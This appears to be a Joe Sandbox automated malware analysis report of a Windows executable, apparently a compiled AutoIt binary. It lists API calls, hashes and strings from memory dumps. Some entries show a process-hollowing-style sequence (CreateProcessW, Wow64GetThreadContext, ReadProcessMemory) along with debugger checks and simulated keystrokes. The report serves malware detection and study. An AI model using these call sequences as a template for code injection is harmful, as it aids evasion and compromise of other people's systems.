                                                                                                                      • Part of subcall function 0034309F: ExitProcess.KERNEL32 ref: 003430AE
                                                                                                                      • Part of subcall function 00348B28: __getptd_noexit.LIBCMT ref: 00348B28
                                                                                                                    • RtlAllocateHeap.NTDLL(011A0000,00000000,00000001,00000000,?,?,?,00340DD3,?), ref: 0034575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1372826849-0
                                                                                                                    • Opcode ID: 4b7c16131d72ce7d1f9b7da08ac931c87f2bfb7d9577e480e726f9c61095ee75
                                                                                                                    • Instruction ID: bd2381b60a00f52ad44159bbc21db9e7562ddca109691d73ec3dc159626c3409
                                                                                                                    • Opcode Fuzzy Hash: 4b7c16131d72ce7d1f9b7da08ac931c87f2bfb7d9577e480e726f9c61095ee75
                                                                                                                    • Instruction Fuzzy Hash: 55018C35A40A01DFE6232B78EC86A6E7BCCDB82761F110535F5559F5D2DF70BC005A61
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00389548,?,?,?,?,?,00000004), ref: 003898BB
                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00389548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003898D1
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00389548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003898D8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397143404-0
                                                                                                                    • Opcode ID: 79d75fbdc9950b868446b8f7a4c8250ea591f9f2d4ec48941375b61a83c53734
                                                                                                                    • Instruction ID: 71b4268976e541c1a60605b25098e22553c98c889be4876762ffa93c6f94b738
                                                                                                                    • Opcode Fuzzy Hash: 79d75fbdc9950b868446b8f7a4c8250ea591f9f2d4ec48941375b61a83c53734
                                                                                                                    • Instruction Fuzzy Hash: 3FE08632240214BFDB332B94EC09FDA7B1DAB07760F144221FB54690E087B115119798
APIs
• _free.LIBCMT ref: 00388D1B
  • Part of subcall function 00342D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00349A24), ref: 00342D69
  • Part of subcall function 00342D55: GetLastError.KERNEL32(00000000,?,00349A24), ref: 00342D7B
• _free.LIBCMT ref: 00388D2C
• _free.LIBCMT ref: 00388D3E
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Strings
Similarity
• API ID:
• String ID: CALL
• API String ID: 0-4196123274
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
• IsThemeActive.UXTHEME ref: 00324834
  • Part of subcall function 0034336C: __lock.LIBCMT ref: 00343372
  • Part of subcall function 0034336C: DecodePointer.KERNEL32(00000001,?,00324849,00377C74), ref: 0034337E
  • Part of subcall function 0034336C: EncodePointer.KERNEL32(?,?,00324849,00377C74), ref: 00343389
  • Part of subcall function 003248FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00324915
  • Part of subcall function 003248FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0032492A
  • Part of subcall function 00323B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00323B68
  • Part of subcall function 00323B3A: IsDebuggerPresent.KERNEL32 ref: 00323B7A
  • Part of subcall function 00323B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,003E52F8,003E52E0,?,?), ref: 00323BEB
  • Part of subcall function 00323B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00323C6F
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00324874
Similarity
• API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
• String ID:
• API String ID: 1438897964-0
APIs
  • Part of subcall function 0034571C: __FF_MSGBANNER.LIBCMT ref: 00345733
  • Part of subcall function 0034571C: __NMSG_WRITE.LIBCMT ref: 0034573A
  • Part of subcall function 0034571C: RtlAllocateHeap.NTDLL(011A0000,00000000,00000001,00000000,?,?,?,00340DD3,?), ref: 0034575F
• std::exception::exception.LIBCMT ref: 00340DEC
• __CxxThrowException@8.LIBCMT ref: 00340E01
  • Part of subcall function 0034859B: RaiseException.KERNEL32(?,?,?,003D9E78,00000000,?,?,?,?,00340E06,?,003D9E78,?,00000001), ref: 003485F0
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID:
• API String ID: 3902256705-0
APIs
Similarity
• API ID: __lock_file_memset
• String ID:
• API String ID: 26237723-0
APIs
  • Part of subcall function 00348B28: __getptd_noexit.LIBCMT ref: 00348B28
• __lock_file.LIBCMT ref: 003453EB
  • Part of subcall function 00346C11: __lock.LIBCMT ref: 00346C34
• __fclose_nolock.LIBCMT ref: 003453F6
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0123908D
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012390B1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012390D3
Memory Dump Source
• Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction ID: 2ba74b6b684ce91df8d56ae66197c4596bd600e6164a0878136b9d20a7f81d27
                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction Fuzzy Hash: 4931BD70B00105DBC71ADF58D4C4A69B7A6FB99300B6586A5E90ACF751DA31EDC1DB80
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 3c992abbebe634d35a3edd61e0c58054ce89b59f09e46f145690e9501b5a4038
                                                                                                                    • Instruction ID: 56c1b13845130ba43cc2fa543a6ac7d752282d975b17c51da76ac21fb1f93499
                                                                                                                    • Opcode Fuzzy Hash: 3c992abbebe634d35a3edd61e0c58054ce89b59f09e46f145690e9501b5a4038
                                                                                                                    • Instruction Fuzzy Hash: 204148746087518FDB26DF14D444B1ABBE0BF45314F0988ACE8998B362C331EC45CF52
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00324BEF
                                                                                                                      • Part of subcall function 0034525B: __wfsopen.LIBCMT ref: 00345266
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00324E0F
                                                                                                                      • Part of subcall function 00324B6A: FreeLibrary.KERNEL32(00000000), ref: 00324BA4
                                                                                                                      • Part of subcall function 00324C70: _memmove.LIBCMT ref: 00324CBA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1396898556-0
                                                                                                                    • Opcode ID: ba798c07bbd0623d607224c55ed823f1f1fd3498ed59e59c91136333b797ab7e
                                                                                                                    • Instruction ID: e6fcb033817dd715254fdaf4660bd796d41cb9081179ba99ab56154f82795c62
                                                                                                                    • Opcode Fuzzy Hash: ba798c07bbd0623d607224c55ed823f1f1fd3498ed59e59c91136333b797ab7e
                                                                                                                    • Instruction Fuzzy Hash: 5D110631600315ABDF27FFB0EC16FAD77A8AF84710F118829F981AF181EB719A049B51
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 05c4cee017ec5923ee575e16969cd9b53ec67e2f0f18338fb80f8bc797a33374
                                                                                                                    • Instruction ID: 82675bfbe667b05e424cadacb097699a7e3541ae14bde1b1b23f9f4bf623b84b
                                                                                                                    • Opcode Fuzzy Hash: 05c4cee017ec5923ee575e16969cd9b53ec67e2f0f18338fb80f8bc797a33374
                                                                                                                    • Instruction Fuzzy Hash: B6213374608711DFCB16DF64D444B1ABBE0BF88314F05886CF98A8B722C731E805CB92
                                                                                                                    APIs
                                                                                                                    • __lock_file.LIBCMT ref: 003448A6
                                                                                                                      • Part of subcall function 00348B28: __getptd_noexit.LIBCMT ref: 00348B28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2597487223-0
                                                                                                                    • Opcode ID: fa10aa41711a10c73a33d43e5b9ddc67fd0d959d943d590f08a2faf6bc597413
                                                                                                                    • Instruction ID: f4271d347bd5d0b756d5f55c4468c6af088150fc3f7a28608d9b7f616cce3688
                                                                                                                    • Opcode Fuzzy Hash: fa10aa41711a10c73a33d43e5b9ddc67fd0d959d943d590f08a2faf6bc597413
                                                                                                                    • Instruction Fuzzy Hash: A4F0C231901609EBDF13AFB48C067EE36E0EF01325F158424F424AE192CB79E951DF51
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(?,?,003E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00324E7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: a4befdbb24f6a4f2915b72cf18347ec70e547d0583ea2ee22dd435ae48e8df7b
                                                                                                                    • Instruction ID: 9e85b9a87ff5f690dd6fd56476d80a2e51766f85a3d6179859d7b5f74e03465e
                                                                                                                    • Opcode Fuzzy Hash: a4befdbb24f6a4f2915b72cf18347ec70e547d0583ea2ee22dd435ae48e8df7b
                                                                                                                    • Instruction Fuzzy Hash: 8DF03971501721CFEB369F64E494812BBE5FF143293228A3EE2D786A20C732A880DF40
                                                                                                                    APIs
                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003407B0
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2514874351-0
                                                                                                                    • Opcode ID: d6bbb8f5276b244c08a1a958e3b1bac18097d1bfbd19636f370309e359f69fd8
                                                                                                                    • Instruction ID: 3d5ff605e6cb395dcdc24aa4954789d7c7a3ed7c8ec0d403febaf3552c2e2b20
                                                                                                                    • Opcode Fuzzy Hash: d6bbb8f5276b244c08a1a958e3b1bac18097d1bfbd19636f370309e359f69fd8
                                                                                                                    • Instruction Fuzzy Hash: ABE0CD369051285BC721D6989C05FEA77DDEFC97A1F0441B5FC0CD7214D9609C8086D0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2638373210-0
                                                                                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                    • Instruction ID: aebebc618746934b1d2273a0e579d749470ba70b2c9e544554c8d35d98dfc82a
                                                                                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                    • Instruction Fuzzy Hash: F5E092B0504B045BD7399B28D800BA373E1AB06304F00085DF2AA97242EB6278418759
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wfsopen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 197181222-0
• Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction ID: 49858897f0976a2f7bc4b12814aafdd92efd74a11891ba1b3966d276c8ab4d7f
• Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
• Instruction Fuzzy Hash: 17B0927684020C77CE022A82EC02A493B699B41764F408021FB0C1C162A6B3A6649A89
APIs
• Sleep.KERNELBASE(000001F4), ref: 01239871
Memory Dump Source
• Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: c51c4f0863699a6956d81b6683dca2003bfdbf5686560a724daba2f1e5836bf5
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: CDE0BF7494410DDFDB00EFA4D54969E7BB4EF44301F100261FD0192281D67099508A62
APIs
  • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003ACB37
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ACB95
• GetWindowLongW.USER32(?,000000F0), ref: 003ACBD6
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ACC00
• SendMessageW.USER32 ref: 003ACC29
• _wcsncpy.LIBCMT ref: 003ACC95
• GetKeyState.USER32(00000011), ref: 003ACCB6
• GetKeyState.USER32(00000009), ref: 003ACCC3
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ACCD9
• GetKeyState.USER32(00000010), ref: 003ACCE3
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ACD0C
• SendMessageW.USER32 ref: 003ACD33
• SendMessageW.USER32(?,00001030,?,003AB348), ref: 003ACE37
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003ACE4D
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003ACE60
• SetCapture.USER32(?), ref: 003ACE69
• ClientToScreen.USER32(?,?), ref: 003ACECE
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003ACEDB
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003ACEF5
• ReleaseCapture.USER32 ref: 003ACF00
• GetCursorPos.USER32(?), ref: 003ACF3A
• ScreenToClient.USER32(?,?), ref: 003ACF47
• SendMessageW.USER32(?,00001012,00000000,?), ref: 003ACFA3
• SendMessageW.USER32 ref: 003ACFD1
• SendMessageW.USER32(?,00001111,00000000,?), ref: 003AD00E
• SendMessageW.USER32 ref: 003AD03D
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003AD05E
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 003AD06D
• GetCursorPos.USER32(?), ref: 003AD08D
• ScreenToClient.USER32(?,?), ref: 003AD09A
• GetParent.USER32(?), ref: 003AD0BA
• SendMessageW.USER32(?,00001012,00000000,?), ref: 003AD123
• SendMessageW.USER32 ref: 003AD154
• ClientToScreen.USER32(?,?), ref: 003AD1B2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003AD1E2
• SendMessageW.USER32(?,00001111,00000000,?), ref: 003AD20C
• SendMessageW.USER32 ref: 003AD22F
• ClientToScreen.USER32(?,?), ref: 003AD281
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003AD2B5
  • Part of subcall function 003225DB: GetWindowLongW.USER32(?,000000EB), ref: 003225EC
• GetWindowLongW.USER32(?,000000F0), ref: 003AD351
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F$pb>
• API String ID: 3977979337-3272271458
• Opcode ID: ecd3715ec57adcfe00dac7c152f84aae1caa3d2021e0583edd4889d4fb079d87
• Instruction ID: dc1c31cd1adf2524320e109e7e3e789939c76993baa9172550370a678b6e4b55
• Opcode Fuzzy Hash: ecd3715ec57adcfe00dac7c152f84aae1caa3d2021e0583edd4889d4fb079d87
• Instruction Fuzzy Hash: 0042B078204341AFDB26CF64C884FAABBE9FF4A314F151619F5558B2B0C731D850DBA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
Similarity
• API ID: _memmove$_memset
• String ID: ]=$3c3$DEFINE$P\=$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_3
• API String ID: 1357608183-732045844
• Opcode ID: d27710b9c0e09c0c944ac48633f846186f9eb00f4d00d5e5cf48584ba0a1d809
• Instruction ID: 169a5819f3409f258fdc8df0cdbac62047a707da5a1d75bbdc859fda353def15
• Opcode Fuzzy Hash: d27710b9c0e09c0c944ac48633f846186f9eb00f4d00d5e5cf48584ba0a1d809
• Instruction Fuzzy Hash: AD93A275E04219DFDB36CF98C881BADB7B1FF48310F25816AE949AB281E7749D81DB40
APIs
• GetForegroundWindow.USER32(00000000,?), ref: 003248DF
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0035D665
• IsIconic.USER32(?), ref: 0035D66E
• ShowWindow.USER32(?,00000009), ref: 0035D67B
• SetForegroundWindow.USER32(?), ref: 0035D685
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0035D69B
• GetCurrentThreadId.KERNEL32 ref: 0035D6A2
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0035D6AE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0035D6BF
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0035D6C7
• AttachThreadInput.USER32(00000000,?,00000001), ref: 0035D6CF
• SetForegroundWindow.USER32(?), ref: 0035D6D2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0035D6E7
• keybd_event.USER32(00000012,00000000), ref: 0035D6F2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0035D6FC
• keybd_event.USER32(00000012,00000000), ref: 0035D701
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0035D70A
• keybd_event.USER32(00000012,00000000), ref: 0035D70F
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0035D719
• keybd_event.USER32(00000012,00000000), ref: 0035D71E
• SetForegroundWindow.USER32(?), ref: 0035D721
• AttachThreadInput.USER32(?,?,00000000), ref: 0035D748
Strings
Memory Dump Source
• Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
